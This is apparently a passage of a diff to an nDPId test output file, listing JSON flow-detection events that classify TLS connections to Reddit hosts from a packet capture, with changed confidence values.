-01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":571,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":573,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686060,"flow_last_seen":1605291686138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686138,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":680,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":686,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01294{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":688,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686060,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":696,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686141,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":700,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686064,"flow_last_seen":1605291686142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686142,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01295{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":713,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291686060,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"styles.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":717,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686064,"flow_last_seen":1605291686144,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686144,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":722,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686145,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686145,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":736,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":738,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686146,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":751,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":223,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":754,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686064,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686148,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"preview.redd.it","server_names":"redd.it,*.redd.it","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redd.it","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3D:15:31:F3:94:55:33:92:88:5C:61:40:B0:FD:ED:27:6D:29:3A:12"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":807,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":809,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":811,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686084,"flow_last_seen":1605291686182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01293{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":818,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291686084,"flow_last_seen":1605291686183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291686183,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","server_names":"*.redditmedia.com,redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.redditmedia.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"96:A3:77:56:81:79:10:5C:E8:7F:F0:33:D2:7E:1C:45:08:2C:25:85"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686129,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686129,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686084,"flow_last_seen":1605291686130,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291686130,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"emoji.redditmedia.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01283{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":535,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605291686035,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":332,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.redditstatic.com","server_names":"www.redditstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=www.redditstatic.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"24:BA:A2:05:04:98:6C:4E:72:57:0C:2C:45:25:9D:1F:8E:C3:CC:A8"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":541,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686060,"flow_last_seen":1605291686137,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291686137,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 